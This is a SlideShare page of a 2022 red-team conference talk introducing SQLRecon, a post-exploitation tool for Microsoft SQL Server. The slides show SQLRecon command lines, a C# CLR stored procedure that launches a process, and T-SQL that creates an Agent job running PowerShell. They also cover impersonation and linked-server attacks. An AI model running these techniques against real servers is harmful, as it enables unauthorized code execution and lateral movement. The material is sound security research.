Submit Search
Upload
Abusing MS SQL Using SQLRecon
•
0 likes
•
393 views
Sanjiv Kawa
Follow
Way West Hackin' Fest 2022
Read less
Read more
Technology
Report
Share
Report
Share
1 of 50
Download now
Download to read offline
Recommended
DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLRecon
DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLRecon
Sanjiv Kawa
Black Hat USA Arsenal 2023: Abusing Microsoft SQL Server with SQLRecon
Black Hat USA Arsenal 2023: Abusing Microsoft SQL Server with SQLRecon
Sanjiv Kawa
Red Team Revenge - Attacking Microsoft ATA
Red Team Revenge - Attacking Microsoft ATA
Nikhil Mittal
Expanding the control over the operating system from the database
Expanding the control over the operating system from the database
Bernardo Damele A. G.
Windows attacks - AT is the new black
Windows attacks - AT is the new black
Chris Gates
Owasp Top 10 A1: Injection
Owasp Top 10 A1: Injection
Michael Hendrickx
Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)
Bernardo Damele A. G.
Drone CI/CD 自動化測試及部署
Drone CI/CD 自動化測試及部署
Bo-Yi Wu
Recommended
DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLRecon
DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLRecon
Sanjiv Kawa
Black Hat USA Arsenal 2023: Abusing Microsoft SQL Server with SQLRecon
Black Hat USA Arsenal 2023: Abusing Microsoft SQL Server with SQLRecon
Sanjiv Kawa
Red Team Revenge - Attacking Microsoft ATA
Red Team Revenge - Attacking Microsoft ATA
Nikhil Mittal
Expanding the control over the operating system from the database
Expanding the control over the operating system from the database
Bernardo Damele A. G.
Windows attacks - AT is the new black
Windows attacks - AT is the new black
Chris Gates
Owasp Top 10 A1: Injection
Owasp Top 10 A1: Injection
Michael Hendrickx
Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)
Bernardo Damele A. G.
Drone CI/CD 自動化測試及部署
Drone CI/CD 自動化測試及部署
Bo-Yi Wu
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows Environment
Teymur Kheirkhabarov
I hunt sys admins 2.0
I hunt sys admins 2.0
Will Schroeder
Beyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL Server
Scott Sutherland
Windows Attacks AT is the new black
Windows Attacks AT is the new black
Rob Fuller
64 Methods for Mimikatz Execution
64 Methods for Mimikatz Execution
Hadess
Securing AEM webapps by hacking them
Securing AEM webapps by hacking them
Mikhail Egorov
Docker Container Security
Docker Container Security
Suraj Khetani
DevOps - Interview Question.pdf
DevOps - Interview Question.pdf
MinhTrnNht7
K8s security best practices
K8s security best practices
Sharon Vendrov
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEM
Frans Rosén
An ACE in the Hole - Stealthy Host Persistence via Security Descriptors
An ACE in the Hole - Stealthy Host Persistence via Security Descriptors
Will Schroeder
A Case Study in Attacking KeePass
A Case Study in Attacking KeePass
Will Schroeder
Sql injection
Sql injection
Zidh
Container Security Deep Dive & Kubernetes
Container Security Deep Dive & Kubernetes
Aqua Security
SQL injection prevention techniques
SQL injection prevention techniques
SongchaiDuangpan
Sql Injection attacks and prevention
Sql Injection attacks and prevention
helloanand
Setting up MySQL Replication Cluster in Kubernetes
Setting up MySQL Replication Cluster in Kubernetes
Elizabeth Yu, MBA
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
Mikhail Egorov
SQL INJECTION
SQL INJECTION
Mentorcs
Chickens & Eggs: Managing secrets in AWS with Hashicorp Vault
Chickens & Eggs: Managing secrets in AWS with Hashicorp Vault
Jeff Horwitz
Bp307 Practical Solutions for Connections Administrators, tips and scrips for...
Bp307 Practical Solutions for Connections Administrators, tips and scrips for...
Sharon James
Automated CI with AEM Cloud service
Automated CI with AEM Cloud service
Jakub Wadolowski
More Related Content
What's hot
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows Environment
Teymur Kheirkhabarov
I hunt sys admins 2.0
I hunt sys admins 2.0
Will Schroeder
Beyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL Server
Scott Sutherland
Windows Attacks AT is the new black
Windows Attacks AT is the new black
Rob Fuller
64 Methods for Mimikatz Execution
64 Methods for Mimikatz Execution
Hadess
Securing AEM webapps by hacking them
Securing AEM webapps by hacking them
Mikhail Egorov
Docker Container Security
Docker Container Security
Suraj Khetani
DevOps - Interview Question.pdf
DevOps - Interview Question.pdf
MinhTrnNht7
K8s security best practices
K8s security best practices
Sharon Vendrov
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEM
Frans Rosén
An ACE in the Hole - Stealthy Host Persistence via Security Descriptors
An ACE in the Hole - Stealthy Host Persistence via Security Descriptors
Will Schroeder
A Case Study in Attacking KeePass
A Case Study in Attacking KeePass
Will Schroeder
Sql injection
Sql injection
Zidh
Container Security Deep Dive & Kubernetes
Container Security Deep Dive & Kubernetes
Aqua Security
SQL injection prevention techniques
SQL injection prevention techniques
SongchaiDuangpan
Sql Injection attacks and prevention
Sql Injection attacks and prevention
helloanand
Setting up MySQL Replication Cluster in Kubernetes
Setting up MySQL Replication Cluster in Kubernetes
Elizabeth Yu, MBA
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
Mikhail Egorov
SQL INJECTION
SQL INJECTION
Mentorcs
Chickens & Eggs: Managing secrets in AWS with Hashicorp Vault
Chickens & Eggs: Managing secrets in AWS with Hashicorp Vault
Jeff Horwitz
What's hot
(20)
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows Environment
I hunt sys admins 2.0
I hunt sys admins 2.0
Beyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL Server
Windows Attacks AT is the new black
Windows Attacks AT is the new black
64 Methods for Mimikatz Execution
64 Methods for Mimikatz Execution
Securing AEM webapps by hacking them
Securing AEM webapps by hacking them
Docker Container Security
Docker Container Security
DevOps - Interview Question.pdf
DevOps - Interview Question.pdf
K8s security best practices
K8s security best practices
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEM
An ACE in the Hole - Stealthy Host Persistence via Security Descriptors
An ACE in the Hole - Stealthy Host Persistence via Security Descriptors
A Case Study in Attacking KeePass
A Case Study in Attacking KeePass
Sql injection
Sql injection
Container Security Deep Dive & Kubernetes
Container Security Deep Dive & Kubernetes
SQL injection prevention techniques
SQL injection prevention techniques
Sql Injection attacks and prevention
Sql Injection attacks and prevention
Setting up MySQL Replication Cluster in Kubernetes
Setting up MySQL Replication Cluster in Kubernetes
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
SQL INJECTION
SQL INJECTION
Chickens & Eggs: Managing secrets in AWS with Hashicorp Vault
Chickens & Eggs: Managing secrets in AWS with Hashicorp Vault
Similar to Abusing MS SQL Using SQLRecon
Bp307 Practical Solutions for Connections Administrators, tips and scrips for...
Bp307 Practical Solutions for Connections Administrators, tips and scrips for...
Sharon James
Automated CI with AEM Cloud service
Automated CI with AEM Cloud service
Jakub Wadolowski
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
Scott Sutherland
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Scott Sutherland
Beyond XP_CMDSHELL: Owning the Empire Through SQL Server
Beyond XP_CMDSHELL: Owning the Empire Through SQL Server
NetSPI
Security in the Real World - JavaOne 2013
Security in the Real World - JavaOne 2013
MattKilner
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
Gabriel Mathenge
Windows Debugging Tools - JavaOne 2013
Windows Debugging Tools - JavaOne 2013
MattKilner
SaltConf 2015: Salt stack at web scale: Better, Stronger, Faster
SaltConf 2015: Salt stack at web scale: Better, Stronger, Faster
Thomas Jackson
IBM Lotusphere 2013 AD109: Using the IBM® Sametime® Proxy SDK: WebSphere Port...
IBM Lotusphere 2013 AD109: Using the IBM® Sametime® Proxy SDK: WebSphere Port...
William Holmes
resilient_training_labs v12 copy.pptx
resilient_training_labs v12 copy.pptx
modathernady
Wsadminlib.wasug.2011 0125-0726
Wsadminlib.wasug.2011 0125-0726
Rohit Kelapure
Command pattern vs. MVC: Lean Beans (are made of this)
Command pattern vs. MVC: Lean Beans (are made of this)
philipdurbin
Tips for Developing and Testing IBM HATS Applications
Tips for Developing and Testing IBM HATS Applications
Strongback Consulting
Modularizing AcmeAir: A case study in modularizing a Java App
Modularizing AcmeAir: A case study in modularizing a Java App
Dinakar Guniguntala
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
Carl Tyler
2) security
2) security
guptavikki99
Using Massively Distributed Malware in APT-Style Attacks
Using Massively Distributed Malware in APT-Style Attacks
IBM Security
TSRT Crashes
TSRT Crashes
ashiesh0007
The enterprise manager command line interface2
The enterprise manager command line interface2
Kellyn Pot'Vin-Gorman
Similar to Abusing MS SQL Using SQLRecon
(20)
Bp307 Practical Solutions for Connections Administrators, tips and scrips for...
Bp307 Practical Solutions for Connections Administrators, tips and scrips for...
Automated CI with AEM Cloud service
Automated CI with AEM Cloud service
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Beyond XP_CMDSHELL: Owning the Empire Through SQL Server
Beyond XP_CMDSHELL: Owning the Empire Through SQL Server
Security in the Real World - JavaOne 2013
Security in the Real World - JavaOne 2013
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
Windows Debugging Tools - JavaOne 2013
Windows Debugging Tools - JavaOne 2013
SaltConf 2015: Salt stack at web scale: Better, Stronger, Faster
SaltConf 2015: Salt stack at web scale: Better, Stronger, Faster
IBM Lotusphere 2013 AD109: Using the IBM® Sametime® Proxy SDK: WebSphere Port...
IBM Lotusphere 2013 AD109: Using the IBM® Sametime® Proxy SDK: WebSphere Port...
resilient_training_labs v12 copy.pptx
resilient_training_labs v12 copy.pptx
Wsadminlib.wasug.2011 0125-0726
Wsadminlib.wasug.2011 0125-0726
Command pattern vs. MVC: Lean Beans (are made of this)
Command pattern vs. MVC: Lean Beans (are made of this)
Tips for Developing and Testing IBM HATS Applications
Tips for Developing and Testing IBM HATS Applications
Modularizing AcmeAir: A case study in modularizing a Java App
Modularizing AcmeAir: A case study in modularizing a Java App
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
2) security
2) security
Using Massively Distributed Malware in APT-Style Attacks
Using Massively Distributed Malware in APT-Style Attacks
TSRT Crashes
TSRT Crashes
The enterprise manager command line interface2
The enterprise manager command line interface2
Recently uploaded
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
Igalia
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
The Digital Insurer
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
Khushali Kathiriya
Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024
SynarionITSolutions
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
lior mazor
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
Martijn de Jong
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
ThousandEyes
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
apidays
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
wesley chun
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
Gabriella Davis
presentation ICT roal in 21st century education
presentation ICT roal in 21st century education
jfdjdjcjdnsjd
Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024
The Digital Insurer
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
wesley chun
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
apidays
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
Joaquim Jorge
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
apidays
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
The Digital Insurer
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
Anna Loughnan Colquhoun
Recently uploaded
(20)
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
presentation ICT roal in 21st century education
presentation ICT roal in 21st century education
Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
Abusing MS SQL Using SQLRecon
1.
Abusing MS SQL
Using SQLRecon Sanjiv Kawa Adversary Simulation, IBM X-Force Red May 6, 2022
2.
whoami? IBM Security /
© 2022 IBM Corporation 2 Role » Adversary Simulation, IBM X-Force Red Hobbies
3.
Agenda 3 IBM Security /
© 2022 IBM Corporation Introducing SQLRecon 3 min Demo 1: Basic Modules 2 min Demo 2: Impersonation Attacks 4 min Demo 3: Attacking Linked SQL Servers 4 min Development Roadmap 1 min Conclusion & Questions 1 min
4.
Introducing SQLRecon IBM Security
/ © 2022 IBM Corporation 4
5.
What’s currently available? 5 IBM
Security / © 2022 IBM Corporation A good amount of offensive MS SQL tools already exists – metasploit – crackmapexec – PowerUpSQL
6.
How did this
research come about? 6 IBM Security / © 2022 IBM Corporation Like most tooling … to solve a problem encountered on an engagement Also to address the MS SQL C# post-exploitation tooling gap – Modernize the approach – Works with a diverse set of C2 frameworks – execute-assembly and InlineExecute-Assembly compatible
7.
Why bother attacking
MS SQL? 7 IBM Security / © 2022 IBM Corporation Often overlooked Often misconfigured BuiltinUsers can connect to MS SQL servers by default, and: – Execute basic SQL commands – Determine rights via user mapping/roles -> impersonation attacks – UNC path injection. Creds or SMB relay -> code execution – Piggyback off rights to compromise linked servers
8.
Demo Time IBM Security
/ © 2022 IBM Corporation 8
9.
Demo 1: Basic
Modules IBM Security / © 2022 IBM Corporation 9
10.
10 IBM Security /
© 2022 IBM Corporation 1. Set an authentication context 2. Supply a module SQLRecon.exe -a Windows –s SQL01 –d msdb –m whoami SQLRecon.exe -a Local –s SQL01 –d msdb –u sa –p Password123 –m whoami SQLRecon.exe -a Azure –r domain.com –d msdb –u jsmith –p Password123 –m whoami Usage
11.
11 IBM Security /
© 2022 IBM Corporation Demo Context
12.
12 IBM Security /
© 2022 IBM Corporation query whoami databases tables search smb Plenty more … (SQLRecon.exe –h) Basic Modules
13.
13 IBM Security /
© 2022 IBM Corporation Privilege Check
14.
14 IBM Security /
© 2022 IBM Corporation whoami
15.
15 IBM Security /
© 2022 IBM Corporation whoami ctd.
16.
16 IBM Security /
© 2022 IBM Corporation databases
17.
17 IBM Security /
© 2022 IBM Corporation tables
18.
18 IBM Security /
© 2022 IBM Corporation search
19.
19 IBM Security /
© 2022 IBM Corporation query
20.
20 IBM Security /
© 2022 IBM Corporation smb
21.
Demo 2: Impersonation
Attacks IBM Security / © 2022 IBM Corporation 21
22.
22 IBM Security /
© 2022 IBM Corporation Demo Configuration - Impersonation Impersonate is a special permission Enables a user or group to: - Operate with the permissions of another user; - As well as their own permissions.
23.
23 IBM Security /
© 2022 IBM Corporation SQLRecon.exe -a Windows –s SQL02 –d master –m impersonate SQLRecon.exe -a Windows –s SQL02 –d master –m iwhoami –i sa Impersonation
24.
24 IBM Security /
© 2022 IBM Corporation impersonate
25.
25 IBM Security /
© 2022 IBM Corporation using System.Data.SqlClient; using System.Data.SqlTypes; using Microsoft.SqlServer.Server; public partial class StoredProcedures { [Microsoft.SqlServer.Server.SqlProcedure] public static void BaconTime () { } } https://gist.github.com/skahwah/c92a8ce41f529f40c14715c91b8f90ce https://gist.github.com/skahwah/a585e176e4a5cf319b0c759637f5c410 Custom CLR Assemblies
26.
26 IBM Security /
© 2022 IBM Corporation using System; using System.Data; using System.Data.SqlClient; using System.Data.SqlTypes; using Microsoft.SqlServer.Server; using System.Diagnostics; public partial class StoredProcedures { [Microsoft.SqlServer.Server.SqlProcedure] public static void BaconTime () { Process proc = new Process(); proc.StartInfo.FileName = "C:WindowsSystem32notepad.exe"; proc.Start(); } } https://gist.github.com/skahwah/c92a8ce41f529f40c14715c91b8f90ce https://gist.github.com/skahwah/a585e176e4a5cf319b0c759637f5c410 Custom CLR Assemblies
27.
27 IBM Security /
© 2022 IBM Corporation ienableclr
28.
28 IBM Security /
© 2022 IBM Corporation Upload DLL to disk
29.
29 IBM Security /
© 2022 IBM Corporation iclr
30.
30 IBM Security /
© 2022 IBM Corporation idisableclr
31.
31 IBM Security /
© 2022 IBM Corporation Caveat: - SQL Agent must be running - Does not work with SQL Server Express edition - Works with: Developer, Standard and Enterprise editions Agent Jobs
32.
32 IBM Security /
© 2022 IBM Corporation iagentstatus
33.
33 IBM Security /
© 2022 IBM Corporation EXEC dbo.sp_add_job @job_name = 'test_ps_job1'; EXEC sp_add_jobstep @job_name = 'test_ps_job1', @step_name = 'test_ps_name1', @subsystem = 'PowerShell', @command = 'powershell.exe start-process notepad', @retry_attempts = 1, @retry_interval = 5; EXEC dbo.sp_add_jobserver @job_name = 'test_ps_job1'; EXEC dbo.sp_start_job 'test_ps_job1'; WAITFOR DELAY '00:00:05'; EXEC dbo.sp_delete_job @job_name = 'test_ps_job1'; Agent Jobs
34.
34 IBM Security /
© 2022 IBM Corporation iagentcmd
35.
Demo 3: Attacking
Linked SQL Servers IBM Security / © 2022 IBM Corporation 35
36.
36 IBM Security /
© 2022 IBM Corporation Demo Configuration - Links SQL02 might be segmented from the network you’re on A link could exist from SQL01 -> SQL02 Leverage SQL01 to issue queries on SQL02
37.
37 IBM Security /
© 2022 IBM Corporation SQLRecon.exe -a Windows –s SQL01 –d master –m links SQLRecon.exe -a Windows –s SQL01 –d master –m lwhoami –l SQL02 Linked SQL Servers
38.
38 IBM Security /
© 2022 IBM Corporation links SQLRecon.exe -a Windows –s SQL01 –d master –m links
39.
39 IBM Security /
© 2022 IBM Corporation lwhoami
40.
40 IBM Security /
© 2022 IBM Corporation ldatabases
41.
41 IBM Security /
© 2022 IBM Corporation ltables
42.
42 IBM Security /
© 2022 IBM Corporation lenableole
43.
43 IBM Security /
© 2022 IBM Corporation lolecmd
44.
44 IBM Security /
© 2022 IBM Corporation ldisableole
45.
45 IBM Security /
© 2022 IBM Corporation lsmb
46.
Development Roadmap IBM Security
/ © 2022 IBM Corporation 46
47.
47 IBM Security /
© 2022 IBM Corporation - Expand Command Execution Techniques To Do’s Execution Technique Standard Impersonation Linked xp_cmdshell ✅ ✅ ✅ OLE Automation ✅ ✅ ✅ Custom CLR Assemblies ✅ ✅ ❌ Agent Jobs ✅ ✅ ❌
48.
Conclusion IBM Security /
© 2022 IBM Corporation 48
49.
49 IBM Security /
© 2022 IBM Corporation Address the MS SQL C# post-exploitation tooling gap Helps operators using C2 frameworks perform MS SQL attacks Conclusion & Questions @sanjivkawa github.com/skahwah/SQLRecon
Download now